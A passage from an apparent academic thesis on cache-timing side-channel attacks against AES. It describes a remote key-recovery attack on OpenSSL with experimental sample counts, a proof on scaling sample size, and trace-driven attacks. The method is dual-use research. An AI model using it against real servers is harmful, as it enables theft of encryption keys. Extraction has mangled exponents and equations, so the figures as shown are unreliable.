search space from 128 bits to 80 bits. The basic underlying idea presented in [62]
is similar to our first round attack (c.f. Section 5.2.1).
4.2.9. Internal Cache Collision Attacks by Bonneau et al.
Bonneau et al. documented possible internal collision based time-driven
cache attacks in [18]. The experimental results show that their most effective
attack, which considers the collisions occur during the last round of AES, requires
between 213 and 220 encryptions to break the cipher. This last round attack
requires the least number of encryptions among all of the time-driven cache attacks
presented above.
4.2.10. Overview of Our Cache Attacks
Although the results presented in [18] seem to be low, they do not reflect
actual situations. Bonneau et al.’s experiments, along with those given in [14],
are conducted in a hypothetical environment without considering the realistic
scenarios. In all of these experiments, the AES encryption is executed via a
function call and the execution time of this internal AES function is measured
72
and used in the analysis. However, in a real attack, there is no way that an
adversary can execute inside his own process an AES cipher that operates with
secret key owned by someone else. The cipher and the attack tool have to be
different unrelated processes running on the same or different machines connected
via a network. Therefore, an actual attack suffers from measuremental noise due
to network delays, stack delays, and such. Although, the findings of [14, 18, 100]
indicate the feasibility of these cache attacks on real security systems in principal,
they do not give the computational requirements and prove the practicality of
actual attacks.
There are many studies on cache attacks in the literature and many attempts to develop a remote cache attack that can reveal a key on a server running
over a network. Despite of some inaccurate claims on remote cache attacks being
able to devised, which were proven to be wrong eventually, none of these efforts
was successful to achieve the ultimate goal of developing a generic and universally
applicable cache attack that can also compromise remote systems. We show how
one can devise and apply such a remote cache attack in the next chapter. We
present those ideas in [5] and show how to use them to develop a universal remote
cache attack on AES. Our results prove that cache attacks cannot be considered
as pure local attacks and they can be applied to software systems running over a
network.
Furthermore, in Chapter 6, we analyze trace-driven cache attacks, which
are one of three types of cache attacks identified so far. We construct an analytical
model for trace-driven attacks that enables one to analyze such attacks on different
implementations and different platforms [3, 4]. We also develop very efficient
trace-driven attacks on AES and apply our model on those attacks as a case
73
study. We show that trace-driven attacks have more potential than what is stated
in previous works.
74
5. CACHE BASED REMOTE TIMING ATTACK ON THE AES
All of the cache attacks presented in the previous chapter, except [14],
either assume that the cache does not contain any data related to the encryption process prior to each encryption or explicitly force the cache architecture to
replace some of the cipher data. The implementations of Tsunoo et al. accomplish the so-called ‘cache cleaning’ by loading some garbage data into the cache to
clean it before each encryption [100, 101]. The need of cleaning the cache makes
an attack impossible to reveal information about the cryptosystems on remote
machines, because the attacker must have an access to the computer to perform
cache cleaning. They did not investigate if their attacks could successfully recover
the key without employing explicit cache cleaning on certain platforms.
Attacks described in [73] replace the cipher data on the cache with some
garbage data by loading the content of a local array into the cache. Again, the attacker needs an access to the target platform to perform these attacks. Therefore,
none of the mentioned studies could be considered as practical for remote attacks
over a network, unless the attacker is able to manipulate the cache remotely.
In this chapter, we present a robust effective cache attack, which can be
used to compromise remote systems, on the AES implementation described in
[31] for 32-bit architectures. Although our basic principles can be used to develop similar attacks on other implementations, we only focus on this particular
implementation stated above and described in Section 2.2.2.
We show that it is possible to apply a cache attack without employing
cache cleaning or explicitly aimed cache manipulations when the cipher under
the attack is running on a multitasking system, especially on a busy server. In
our experiments we run a dummy process simultaneously with the cipher process.
75
Our dummy process randomly issues memory accesses and eventually causes the
eviction of AES data from the cache. This should not be considered as a form of
intentional cache cleaning, because we use this dummy process only to imitate a
moderate workload on the server. In presence of different processes that run on
the same machine with the cipher process, the memory accesses that are issued
by these processes automatically evict the AES data, i.e., cause the same effect of
our dummy process on the execution of the cipher.
5.1. The Underlying Principal of Devising a Remote Cache Attack
Multitasking operating systems allow the execution of multiple processes
on the same computer, concurrently. In other words, each process is given permission to use the resources of the computer, not only the processor but also the
cache and other resources. Although it depends on the cache architecture and
the replacement policy, we can roughly say that the cache contains most recently
used data almost all the time. If an encryption process stalls for enough time, the
cipher data will completely be removed from the cache, in case of the presence
of other processes on the machine. In a simultaneous multithreading system, the
encryption process does not even have to stall. The data of the process, especially
parts of large tables, is replaced by other processes’ data on-the-fly, if there is
enough workload on the system.
The results of our experiments show that the attack can work in such a
case on a simultaneous multithreading environment. The reader should note that
our results also point the vulnerability of remote systems against Tsunoo’s attack
on DES, as well.
76
5.2. Details of Our Basic Attack
In this section we outline an example cache attack on AES with a key size
of 128 bits. In our experiments we consider the 128-bit AES version with a block
length of 128 bits. Our attack can be adjusted to AES with key length 192 or 256
in a straight-forward manner (cf. Subsect. 5.3).
The basic attack consists of two different stages, considering table-lookups
from the first and second round, respectively. The basic attack may be considered
as an adaption of the ideas from the earlier cache attack works to a timing attack
on AES since similar equations are used. Our improved attack variant is a completely novel approach. It employs a different decision strategy than the basic one
and is much more efficient. It does not have different parts and falls into sixteen
independent 8-bit guessing problems.
The differences of our approaches from the earlier works are the followings.
First of all, we exploit the internal collisions, i.e., the collisions between different
table lookups of the cipher. Some of the earlier works (e.g. [73, 67, 77, 15]) exploits
the cache collisions between the memory accesses of the cipher and another process. Exploiting such external collisions mandates the use of explicit local cache
manipulations by (e.g.) having access to the target machine and reading a local
data structure. This necessity makes these attacks unable to compromise remote
systems. On the other hand, taking advantage of internal collisions removes this
necessity and enables one to devise remote attacks as shown in this chapter.
The idea of using internal collisions is employed in some of the previous
works, e.g. in [101, 100, 62]. The earlier timing attacks that rely on internal
collisions perform the so-called cache cleaning, which is also a form of explicit
local cache manipulations. These works did not realize the possibility of automatic
77
cache evictions due to the workload on the system, and therefore could not show
the feasibility of remote attacks.
We use the second attack model explained in the previous chapter. The
attack model discussed in Section 4.1.1.2 is partially correct, except the lack of
counting the fact that two different accesses to the same cache line may even
increase the overall execution time. We realized during our experimentation that
an internal collision, i.e., a cache hit, at a particular AES access either shortens
or lenghtens the overall execution time. The latter phenomenon may occur if a
cache hit occurs from a logical point of view but the respective cache line has
not already been loaded, inducing double work. Thus, if we gather a sample of
messages and each of these messages generates a cache hit during the same access,
then the execution time distribution of this sample will be significantly different
than that of a random sample. We consider this fact to develop our attacks on
the AES.
5.2.1. First Round Attack
The implementation we analyze is described in [31] and it is widely used
on 32-bit architectures (c.f. Section 2.2.2). The first 4 references to the first table,
T0, are:
P0 ⊕ K0 , P4 ⊕ K4 , P8 ⊕ K8 , P12 ⊕ K12 .
If any two of these four references are forced to map to the same cache line for a
sample of plaintext then we know that this will affect the average execution time.
For example, if we assign the value hP0 ⊕ K0 ⊕ K4 i to hP4 i, i.e.,
hP4 i = hP0 ⊕ K0 ⊕ K4 i
78
for a large sample of plaintexts, then the timing characteristics of this sample will
be different than that of a randomly chosen sample. We can use this fact to guess
the correct key byte difference hK0 ⊕ K4 i.
Using the same idea, we can find all key byte differences i,j = hKi ⊕ Kj i
with i, j ∈ {0, 4, 8, 12}. For properly selected indices (i1 , j1 ), (i2 , j2 ), (i3 , j3 ), i.e. if
the GF (2)-linear span of {Ki1 ⊕ Kj1 , Ki2 ⊕ Kj2 , Ki3 ⊕ Kj3 } contains all six XOR
sums K0 ⊕ K4 , K0 ⊕ K8 , . . . , K8 ⊕ K12 , then each i,j follows immediately from
i1 ,j1 , i2 ,j2 and i3 ,j3 . We can further reduce the search space by considering the
accesses to other three tables T1, T2 and T3.
In general, we can obtain hKi ⊕ K4∗j+i i for i, j ∈ {0, 1, 2, 3}. Since (8 − `)
is the size of the most significant part of a table entry in terms of the number
of bits (c.f. Section 4.1.1.2) the first round attack allows us to reduce the search
space by 12 ∗ (8 − `) bits. The parameter ` depends on the cache architecture.
For ` = 0, which constitutes the theoretical lower bound, the search space for a
128 bit key becomes only 32 bits. For ` = 4 the search space is reduced by 48 bits
yielding an 80-bit problem.
On widely used processors, the search space typically reduces to 56, 68, or
80 bits for 128-bit keys. In the environment where we performed our experiments
the cache line size of the L1 cache is 64 bytes, i.e. the most significant part of
a key byte difference is 4 bits long. In other words, we can only obtain the first
4 bits of Ki ⊕ K4∗j+i and the remaining 4 bits have to be searched exhaustively
unless we use a second round attack.
79
5.2.2. Second Round Attack – Basic Variant
Using the guesses from the first round a similar guessing procedure can be
applied in the second round to obtain the remaining key bits. We briefly explain
an approach that exploits only accesses to T0 , i.e., the first table. To simplify
notation we set ∆i := Pi ⊕ Ki in the remainder of this section. In the second
round, the encryption accesses four times to T0, namely to obtain the values
2 • s(∆8 ) ⊕ 3 • s(∆13 ) ⊕ s(∆2 ) ⊕ s(∆7 ) ⊕ s(K13 ) ⊕ K0 ⊕ K4 ⊕ K8 ⊕ 0x01
(5.1)
2 • s(∆0 ) ⊕ 3 • s(∆5 ) ⊕ s(∆10 ) ⊕ s(∆15 ) ⊕ s(K13 ) ⊕ K0 ⊕ 0x01
(5.2)
2 • s(∆4 ) ⊕ 3 • s(∆9 ) ⊕ s(∆14 ) ⊕ s(∆3 ) ⊕ s(K13 ) ⊕ K0 ⊕ K4 ⊕ 0x01
(5.3)
2 • s(∆12 ) ⊕ 3 • s(∆1 ) ⊕ s(∆6 ) ⊕ s(∆11 ) ⊕ s(K13 ) ⊕ K0 ⊕ K4 ⊕ K8 ⊕ K12 ⊕ 0x01
(5.4)
where s(x) and • stand for the result of an AES S-box lookup for the input value
x and the finite field multiplication in GF(28 ) as it is realized in AES, respectively.
If the first access (P0 ⊕ K0 ) touches the same cache line as (5.1) for each plaintext
within a sample, i.e. if
hP0 i = h2 • s(∆8 ) ⊕ 3 • s(∆13 ) ⊕ s(∆2 ) ⊕ s(∆7 ) ⊕ s(K13 ) ⊕ K4 ⊕ K8 ⊕ 0x01i (5.5)
the expected average execution time will be different than for a randomly chosen
sample. If we assume that the value hK4 ⊕ K8 i has correctly been guessed within
the first round attack this suggests the following procedure.
1. Phase: Obtain a sample of N many (plaintext, execution time) pairs.
2. Phase: Divide the entity of all (plaintext, execution time) pairs into
f2 , K
f7 , K
f8 , K
g
232 (overlapping) subsets, one set for each candidate (K
13 )
value.
Put each plaintext into all sets that correspond to candidates
80
f2 , K
f7 , K
f8 , K
g
(K
13 ) that satisfy the above equation. Note that a particular
plaintext should be contained in about N/28−` different subsets.
3. Phase: Calculate the timing characteristics of each set, i.e., the average
execution time in our case. Compute the absolute difference between each
average and the average execution time of the entire sample. There will
be a total of 24·8 timing differences, each from a different absolute value of
f2 , K
f7 , K
f8 , K
g
(K
13 ). The set with the largest difference should point to the
correct values for these 4 bytes.
Hence, we can search through all candidates for (K2 , K7 , K8 , K13 ) ∈ GF(2)32 to
guess the true values. Applying the same idea to (5.2) to (5.4) we can recover
the full AES key. Note that in each of the consecutive steps only 4 · 4 = 16 key
bits have to be guessed since Ki and the most significant bits from some other
Kj follow from the first step and ij from the first round attack (cf. Sect. 5.2.1)
where i is a suitable index in {2, 7, 8, 13}.
The bottleneck is clearly the first step since one has to distinguish between
232 key hypotheses rather than between 216 . Experimental results are given in
Sect 5.4. In the next section we introduce a more efficient variant that saves both
samples and computations.
5.3. A More Efficient, Universally Applicable Attack
In the previous section, we explain a second round attack where 32, resp.
16, key bits have to be guessed simultaneously. In this section we introduce
another approach that allows independent search for single key bytes. It is universally applicable in the sense that it could also be applied in any subsequent
round, e.g. to attack AES with 256 bit keys.
81
We explain our idea at (5.1). Our goal is to guess key byte K8 . Recall
that access to the same cache line as for (P0 ⊕ K0 ) is required in the second round
iff (5.5) holds. If we fix the four plaintext bytes P0 , P2 , P7 , and P13 then (5.5)
simplifies to
hci = h2 • s(∆8 )i
(5.6)
with an unknown constant c = c(K0 , K2 , K4 , K7 , K8 , K13 , P0 , P2 , P7 , P13 ). We observe encryptions with randomly selected plaintext bytes Pi for i ∈
/ {0, 2, 7, 13}
and evaluate the timing characeristics with regard to all 256 possible values of
P8 . For the most relevant case, i.e. ` = 4, there are 16 plaintext bytes (2` in the
general case) that yield the correct (but unknown) value < 2 • s(∆8 ) > that meets
(5.5). Ideally, with regard to the timing characteristics, these 16 plaintext bytes
should be ranked first, pointing at the true subkey K8 ; i.e. to a key byte that
gives identical right-hand sides < 2 • s(∆8 ) > for all these 16 plaintext bytes. The
ranking is done similar as in Sectin 5.2.1. To rank the 256 P8 -bytes one calculates
for each subset with equal P8 values the absolute difference of its average execution time with the average execution time of all samples. The set with the highest
difference is ranked first and so on. In a practical attack our decision rule says
e 8 for which a maximum number of
that we decide for that key byte candidate K
the t (e.g. t = 16) top-ranked plaintext bytes yield identical h2 • s(∆8 )i values. If
the decision rule does not clearly point to one subkey candidate, we may perform
the same attack with a second plaintext P00 for which hP0 i 6= hP00 i while we keep
P2 , P7 , P13 fixed (changing hci to hc0 i := hci ⊕ hP0 ⊕ P00 i). Applying the same
decision rule as above, we obtain a second ranking of the subkey candidates.
Clearly, if P8 and P80 meet (5.6) for P0 and P00 , resp., then
hP0 ⊕ P00 i = h2 • s(P8 ⊕ K8 )i ⊕ h2 • s(P80 ⊕ K8 )i.
(5.7)
82
Equation (5.7) may be used as a control equation for probable subkey candidates
e 8 . From the ranking of Pe8 and Pe80 , we derive an order for the pairs (Pe8 , Pe80 ),
K
e.g. by adding the ranks of the components or their absolute distances from the
k) into
respective means. For highly ranked pairs (Pe8 , Pe80 ) we substitute (Pe8 , Pe80 , e
control equation (5.7) where e
k is a probable subkey candidate from the ‘elementary’ attacks.
We note that the attack described above can be applied to exploit the
relation between any two table-lookups. By reordering a type (5.5)-equation one
obtains an equation of type (5.6) whose right-hand side depends only on one
key byte (to be guessed) and one plaintext byte. The plaintext bytes that affect
the left-hand side are kept constant during the attack. The whole key could be
recovered by 16 independent one-key byte guessing problems. We mention that
the (less costly) basic first round attacks might be used to check the guessed
e0, . . . , K
e 15 .
subkey candidates K
5.3.1. Comparison with the basic second round attack from Subsect 5.2.2
For sample size N the ’bottleneck’ of the basic second round attack, the 32
bit guessing step, requires the computation of the average execution times of 232
sample subsets of size ≈ N/28−` . In contrast, each of the 16 runs of the improved
attack variant only requires the computation of the average execution times of
256 subsets of size ≈ NI /256 (with NI denoting the sample size for an individual
guessing problem) and sorting two lists with 256 elements (plaintexts and key
byte candidates). Even more important, 16NI will turn out to be clearly smaller
than N (cf. Sect. 5.4).
83
The only drawback of the improved variant is that it is a chosen-input
attack, i.e., it requires an active role of the adversary. In contrast, the basic
variant explained in the previous section is principally a known-plaintext attack,
which means an adversary does not have to actively interfere with the execution
of the encryption process, i.e., the attack can be carried out by monitoring the
traffic of the encryption process. However, this is only true for the (less important)
so-called innerprocess attacks (cf. Section 5.4 for details). For ‘real’ attacks
(interprocess and remote attacks) the basic variant is performed as a choseninput attack, too, since the attacker needs to choose the plaintext to be encrypted
as the concatenation of several identical 128 bit strings in order to increase the
signal-to-noise ratio.
5.4. Experimental Details and Results
We performed two types of experimental attacks that we call innerprocess
and interprocess attacks to test the validity of our attack variants. In innerprocess attack we generated a random single-block of messages and measured their
encryption times under the same key. The encryption was just a function that
is called by the application to process a message. The execution time of the
cryptosystem was obtained by calculating the difference of the time just before
the function call and immediately after the function return. Therefore, there was
minimum noise and the execution time was measured almost exactly.
For the second part of the experiments, i.e., interprocess attack, we implemented a simple TCP server and a client program that exchange ASCII strings
during the attack. The server reads the queries sent by the client, and sends a
response after encrypting each of them. The client measures the time between
84
sending a message and receiving the reply. These measurements were used to
guess the secret key. The server and client applications run on the same machine
in this attack. There was no transmission delay in the time measurements but
network stack delays were present.
Brumley and Boneh pointed out that a real remote attack over a network
is principally able to break a remote cipher, when the interprocess version of the
same attack works successfully. Furthermore, their experiments also show that
their actual remote attack requirs roughly the same number of samples used in the
interprocess version [21]. Therefore, we only performed interprocess experiments.
Applying an interprocess attack successfully is a sufficient evidence to claim the
actual remote version would also work with (most likely) a larger sample size.
We performed our attack against OpenSSL version 0.9.7e. All of the experiments were run on a 3.06 GHz. HT-enabled Xeon machine with a Linux
operating system. The source code was compiled using the gcc compiler version
3.2.3 with default options. We used random plaintexts generated by rand() and
srand() functions available in the standard C library. The current time is fed into
srand() function, serving as seed for the pseudorandom number generator. We
measured time in terms of clock cycles using the cycle counter.
For the experiments of innerprocess attack, we loaded 8 KB garbage data
into the L1 cache before each encryption to remove all AES data from the first
level cache. We did not employ this type of cache cleaning during the experiments
of interprocess attack. Instead, we wrote a simple dummy program that randomly
accesses an 8 KB array and run this program simultaneously with the server in
order to imitate the effect of a workload on the computer.
We used two parameters in our experiments.
85
1. Sample Size (N ): This is the number of different (plaintext, execution time)
pairs collected during the first phase of the attacks. We have to use a large
enough sample of queries to obtain accurate statistical characteristic of the
system. However, a very large sample size causes unnecessary increase in
the cost of the attack.
2. Message Length (L): This is the number of message blocks in each query.
We concatenated a single random block L many times with one another to
form the actual query. L was 1 during the innerprocess attack, i.e., each
query was a single block, whereas it was 1024 in the interprocess attack.
This parameter is used to increase the signal-to-noise ratio in the case of
having network delays in the measurements.
We performed our attacks on the variant of AES that has 128-bit key and
block sizes. The cache line size of L1 cache is 64 bytes, which makes ` = 4
bits. The cipher was run on ECB mode. In our experiments, we performed all
second round guessing problems for the basic attack with only 212 different key
hypotheses, one of them being the correct key combination. Our intention was
to demonstrate the general principle but to save many encryptions. In this way,
we reduced the complexity of ‘bottleneck’ exhaustive search by even more than a
factor of 220 since less samples are sufficient for the reduced search space.
For the innerprocess attack, collecting 218 samples was enough to find the
correct value of the key. Since we only considered 212 different key hypotheses in
second round guessing problems, the required sample size would be more than 218
for a real scale innerprocess attack. In fact, statistical calculations suggest that
4∗218 samples should be sufficient for 232 key hypotheses although in a strict sense
(5.13) only guarantees an error probability of at most 2/(1 − c) − 2 /(1 − c)2 >
86
2 − 2 (cf. Example 1 in Section 5.5). (The right-hand side denotes the error
probability for the reduced search space while c is unknown.) However, (5.11) is a
(pessimistic) lower bound we may expect that the true error probability is indeed
significantly smaller, possibly after increasing the sample size somewhat.
The key experiment is the interprocess attack, which shows the vulnerability of remote servers against such cache attacks. In our experiments, we collected
50 million random but known samples and applied our attack on this sample set.
This sample size was clearly sufficient to reveal the correct key value among 212
different key hypotheses. Again, the same heuristic arguments indicate the sufficiency of 200 million samples in a real-scale attack. We also estimated the number
of required samples in a remote attack over a local network. Rough statistical considerations indicate that increasing the sample size of the interprocess attack by
a factor of less than 6 should be sufficient to successfully apply the attack on a
remote server.
We tested our improved variant on the same platform with the same settings. The only difference was the set of the plaintexts sent to the server. We only
performed interprocess attack with this new decision strategy. Our experimental
results indicate a clear improvement over the basic attack. We could recover a full
128-bit AES key by encrypting slightly more than 6.5 million samples in average
per each of the 16 guessing problems and a total of 106 million queries, each containing L = 1024 message blocks. Recall the further advantage of the improved
variant, namely the much lower analysis costs.
We want to mention that all of these results correspond to the minimum
number of samples from which we got the correct decision from our decision strategy. In a real-life-attack an adversary clearly has to collect more samples to be
confident on her decisions in a real attack. More sophisticated stochastic models
87
that are tailored to specific cache strategies certainly will improve the efficiency
of our attack.
Our client-server model does not perfectly fit into the behavior of an actual security application. In reality, encrypting/decrypting parties do not send
responses immediately and perform extra operations, besides encryption and decryption. However, this fact does not nullify our client-server model. Although,
the less signal-to-noise ratio in actual attacks increases the cost, it does not change
the principle feasibility of our attacks. We want to mention that timing variations
caused by extra operations decrease the signal-to-noise ratio. If a security application performs the same operations for each processed message, we expect
the “extra timing variations” to be minimal, in which case the decrease in the
signal-to-noise ratio and thus the increase in the cost of the attack also remains
small.
5.5. Scaling the Sample Size N
In order to save measurements we performed our practical experiments
to the basic second round attack from Subsect. 5.2.2 with a reduced key space.
Clearly, to maintain the success probability for the full subkey space the sample
size N must be increased to N 0 since the adversary has to distinguish between
more admissible alternatives. In this section we estimate the ratio r := N 0 /N .
We interpret the measured average execution times for the particular subkey candidates as realizations of normally (Gaussian) distributed random variables, denoted by Y (related to the correct subkey) and X1 , . . . , Xm−1 (related to
the wrong subkey candidates) for the reduced subkey space, resp. X1 , . . . , Xm0 −1
when all possible subkeys are admissible. We may assume Y ∼ N (µA , σA2 ) while
88
Xj ∼ N (µB , σB2 ) for j ≤ m − 1, resp. for j ≤ m0 − 1, with unknown expectations µA and µB and variances σA2 and σB2 . Clearly, µA 6= µB since our attack
exploits differences of the average execution times. Since it only exploits the relation between two table lookups σA2 ≈ σB2 seems to be reasonable, the variances
clearly depending on N . W.l.o.g. we may assume µA > µB . We point out that
E(X1 + ... + Xm−1 + Y )/m ≈ µB unless m is very small.
Pr(correct guess) ≈ Pr(|Y − µB | > max{|X1 − µB |, . . . , |Xm−1 − µB |})
= Pr(min{X1 , ...., Xm−1 } > µB − (Y − µB ), max{X1 , ..., Xm−1 } < Y )
≈ Pr(max{X1 , ..., Xm−1 } < Y )2
(5.8)
Unless m is very small the ≈ sign should essentially be “=”. If the random
variables Y, X1 , . . . , Xm−1 were independent we had
Pr(max{X1 , ..., Xm−1 } ≤ t) =
m−1
Y
Pr(Xj ≤ t) =
(5.9)
j=1
= Φ((t − µB )/σB )m−1
where Φ denotes the cumulative distribution function of the standard normal
distribution. From (5.9) one immediately deduces
Z ∞
Pr(max{X1 , ..., Xm−1 } < Y ) ≈
Φ((z − µB )/σB )m−1 fA (z)dz
(5.10)
−∞
where Y has density fA . In the context of Subsect. 5.2.2 the random variables
Y, X1 , . . . , Xm−1 are yet dependent. However, for different subkey candidates ki
and kj the size of the intersection of the respective subsets is small compared
to the size of these subsets themselves. Hence we may hope that the influence
of the correlation between Xi and Xj is negligible. Under this asumption (5.10)
provides a concrete formula for the probability for a true guess. However, this
formula cannot be evaluated in practice since µA , µB and σA2 ≈ σB2 are unknown.
Instead, we prove useful Lemma.
89
Lemma 1. (i) Let f denote a probability density, while 0 ≤ g, h ≤ 1 are integrable
functions and Mc := {y : g(y) ≤ c}. Assume further that h ≥ g on R \ Mc . Then
Z
h(z)f (z)dz ≥ 1 −
1−c
Z
if
g(z)f (z)dz = 1 − (5.11)
(ii) Let s, u, b > 1. Then there exists a unique y0 > 0 with Φ(y0 s)ub = Φ(y0 )b . In
particular, Φ(ys)ub > Φ(y)b iff y > y0 .
Proof. Assertion (i) follows immediately from
(1 − g(z))f (z)dz ≤
f (z)dz ≤
(1 − c)
Z
Z
Z
(1 − g(z))f (z)dz = Mc
Mc
and hence
Z
Z
Z
h(z)f (z) dz ≥ 0 +
g(z)f (z) dz = (1 − ) −
g(z)f (z)
Mc
Z
c
=1−
.
≥ (1 − ) − c
f (z) dz ≥ 1 − −
1−c
1−c
Mc
R\M
Since Φ(ys)ub /Φ(y)b = (Φ(ys)u /Φ(y))b we may assume b = 1 in the remainder w.l.o.g. Clearly, Φ(ys)u < Φ(y) for y < 0. Hence we concentrate to the
case y ≥ 0. In particular, log(1 − x) = −x + O(x2 ) implies
ψ(y) := log (Φ(ys)u /Φ(y)) = u log(Φ(ys)) − log(Φ(y))
= u log(1 − (1 − Φ(ys))) − log(1 − (1 − Φ(y)))
= −u (1 − Φ(ys)) + (1 − Φ(y)) + O (1 − Φ(y))2
!
1
1
1 u −y2 /2 s2
1
1 −y2 /2 2
−y 2 /2
−
e
−√
e
+O
e
≥ √
y
2π y y 3
2π ys
> 0 for sufficiently large y,
and lim ψ(y) = 0.
y→∞
(5.12)
We note that the last assertion follows immediately from the definition of ψ while
the ’≥’ sign is a consequence from a well-known inequality of the tail of 1 − Φ (see,
90
e.g., [36], Chap. VII, 175 (1.8)). Since ψ is continuous and ψ(0) = log(0.5u−1 ) < 0
there exists a minimal y0 > 0 with ψ(y0 ) = 0. For any y1 ∈ {y ≥ 0 | ψ 0 (y) = 0} the
second derivative simplifies to ψ 00 (y1 ) = t(y1 )Φ0 (y1 )/Φ(y1 ) with t(x) := (1 − s2 )x +
(1 − 1/u)Φ0 (x)/Φ(x). (Note that Φ00 (ys) = −ysΦ0 (ys) and Φ00 (y) = −yΦ0 (y).)
Assume that ψ(y00 ) = 0 for any y00 > y0 . As ψ(0) < 0 and ψ(y0 ) = ψ(y00 ) = 0
the function ψ attains a local maximum in some ym ∈ [0, y00 ). Since t : [0, ∞) → R
is strictly monotonously decreasing ψ cannot attain a local minimum in (ym , ∞)
(with ψ(·) ≤ 0 = ψ(y00 )) which contradicts (5.12). This proves the uniqueness of
y0 and completes the proof of (ii).
Our goal is to apply Lemma 1 to the right-hand side of (5.10). We set
√
u := (m0 −1)/(m−1), b := 1 and s := r with r := N 0 /N . Further, f (z) := fA (z),
√
g(z) := (Φ((z − µB )/σB ))m−1 and h(z) := (Φ( r(z − µB )/σB ))u(m−1) . By (ii) we
have c = Φ((z0 − µB )/σB )m−1 and Mc = (∞, z0 ] with g(z0 ) = h(z0 ). Lemma 1
and (5.8) imply
Pr(correct guess for (m, N )) = (1 − )2 ⇒
"
Pr(correct guess for (m0 , N 0 = rN )) ≥
1−
(5.13)
1−c
2 #
providing a lower probability bound for a correct guess in the full key space attack.
Note that µA , µB , σA2 ≈ σB2 , N, r determine , c and z0 which are yet unknown
in real attacks since µA and µB are unknown. Example 1 gives an idea of the
magnitude of r.
Example 1. Let m = 212 , m0 = 232 , and y0 := (z0 − µB )/σB = Φ−1 (c1/(m−1) ). If
c = 0.5 (resp., if c = 100/101) the number r = N 0 /N = 3.09 (resp., r = 3.85)
√
gives Φ(y0 r)u(m−1) = Φ(y0 )m−1 = 0.5 (resp., = 100/101).
91
5.6. Conclusion
We have presented a cache-based timing attack on AES software implementations. Our experiments indicate that cache attacks can be used to extract
secret keys of remote systems if the system under attack runs on a server with
a multitasking or multithreading system and a large enough workload. Although
a large number of measurements are required to successfully perform a remote
cache attack, it is feasible in principle. In this regard, we would like to point
the feasibility of such cache attacks to the public, and recommend implementing
appropriate countermeasures. Several countermeasures [75, 14, 73, 76, 77, 19]
have been proposed to prevent possible vulnerabilities and develop more secure
systems.
92
6. TRACE-DRIVEN CACHE ATTACKS ON AES
There are various cache based side-channel attacks in the literature, which
are discussed in detail in Chapter 4. Trace-driven attacks are one of the three
types of cache based attacks that had been distinguished so far, c.f. Section 4.1.
We present a trace-driven cache based attack on AES in this chapter. There are
already two trace-driven attacks on AES in the literature [15, 62]. However, our
attacks require significantly less number of measurements (e.g. only 5 measurements in some cases) and are much more efficient than the previous attacks. We
show that trace-driven attacks have indeed much more power than what is stated
in the previous studies.
Furthermore, we present a robust computational model for trace-driven
attacks that allows one to evaluate the cost of such attacks on a given implementation and platform. Although, we only apply our model to a single attack on
AES in this document, it can also be used for other symmetric ciphers like DES.
The main contribution of our model to the field is that it can be used to quantitatively analyze the cost of trace-driven attacks on different implementations of a
cipher. Therefore, we can analyze the effectiveness of various mitigations that can
be used against such attacks. Thus, a designer can use our model to determine
which mitigations he needs to implement against trace-driven attacks to achieve
a predetermined security level.
6.1. Overview of Trace-Driven Cache Attacks
The adversary is assumed to be able to capture the profile of the cache
activity during an encryption in trace-driven attacks. This profile includes the
outcomes of every memory access the cipher issues in terms of cache hits and
93
misses. Therefore, the adversary has the ability to observe if a particular access
to a lookup table yields a hit and can infer information about the lookup indices,
which are key dependent. This ability gives an adversary the opportunity to make
inferences about the secret key.
Trace-driven attacks on AES were first presented in [62, 15]. Bertoni et al.
implemented a cache based power attack that exploits external collisions between
different processes [15]. Their attack requires 256 power traces to reveal the secret AES key. Lauradoux’s power attack exploits the internal collisions inside the
cipher but only considers the first round AES accesses and can reduce the exhaustive search space of a 128-bit AES key to 80 bits. These attacks are described in
more detail in Sections 4.2.7 and 4.2.8.
We describe much more efficient trace-driven attacks on AES in this chapter. Our two-round attack is a known-plaintext attack and exploits the collisions
among the first two rounds of AES. A more efficient version, which we call the
last round attack, considers last round accesses and is a known-ciphertext attack.
In trace-driven cache attacks, the adversary obtains the traces of cache hits
and misses for a sample of encryptions and recovers the secret key of a cryptosystem using this data. We define a trace as a sequence of cache hits and misses. For
example,
M HHM, HM HM, M M HM, HHM H, M M M M, HHHH
are examples of a trace of length 4. Here H and M represents a cache hit and
miss respectively. The first one in the first example is a miss, second one is a
hit, and so on. If an adversary captures such traces, he can determine whether a
particular access during an encryption is a hit or a miss.
94
The trace of an encryption can be captured by the use of power consumption measurements as done in [15, 62]. In this document, we do not get into
the details of how to capture cache traces. We analyze trace-driven attacks on
AES under the assumption that the adversary can capture the traces of AES
encryption. This assumption corresponds to clean measurements in a noiseless
environment. In reality, an adversary may have noise in the measurements in
some circumstances, in which case the cost of the attack may increase depending
on the amplitude of the noise. However, an analysis under the above assumption
gives us a more clear understanding of the attack cost. Assumption of a noiseless
environment also enables us to make more reliable comparison of different attacks.
In a side-channel attack, there are essentially two different phases:
• Online Phase: consists of the collection of side-channel information of the
target cipher. This phase is also known as the sampling phase of the attack.
The adversary encrypts or decrypts different input values and measures the
side-channel information, e.g., power consumption or execution time of the
device.
• Offline Phase: is also known as the analysis phase. In this phase, the adversary processes the data collected in the online phase and makes predictions
and verifications regarding the secret value of the cipher.
An adversary usually performs the former phase completely before the latter one.
However, in some cases, especially in adaptive chosen-text attacks (e.g. [21, 6]),
these two phases may overlap and may be performed simultaneously.
We use two different metrics to evaluate the cost of our attacks. The first
metric is the expected number of traces that we need to capture to narrow the
search space of the AES key down to a certain degree. The second metric is the
95
average number of operations we need to perform to analyze the captured traces
and eliminate the wrong key assumptions. These metrics basically represent the
cost of the online and offline phases of our attacks. As the reader can clearly see
in this chapter, there is a trade-off between the costs of these two phases.
6.2. Trace-Driven Cache Attacks on the AES
In this chapter, we present trace-driven attacks on the most widely used
implementation of AES, and estimate their costs. We assume that the cache does
not contain any AES data prior to each encryption, because the captured traces
cannot be accurate otherwise. Therefore, the adversary is assumed to clean the
cache (e.g., by loading some garbage data as done in [15, 100, 101, 73, 80]) before
the encryption process starts.
Another assumption we make is that the data in AES lookup tables cannot
be evicted from the cache during the encryption once they are loaded into the
cache. This assumption means that each lookup table can only be stored in
a different non-overlapping location of the cache and there is no context-switch
during an encryption or any other process that runs simultaneously with the cipher
and evicts the AES data. These assumptions hold if the cache is large enough,
which is the case for most of the current processors. An adversary can also discard
a trace if a context-switch occurs during the measurement.
We also assume that each measurement is composed of the cache trace of
a single message block encryption. In this document, we only consider AES with
128-bit key and block sizes. Our attacks can easily be adapted to longer key and
block sizes; however we omit these cases for the sake of simplicity.
96
The implementation we analyze is described in [31] and it is suitable for
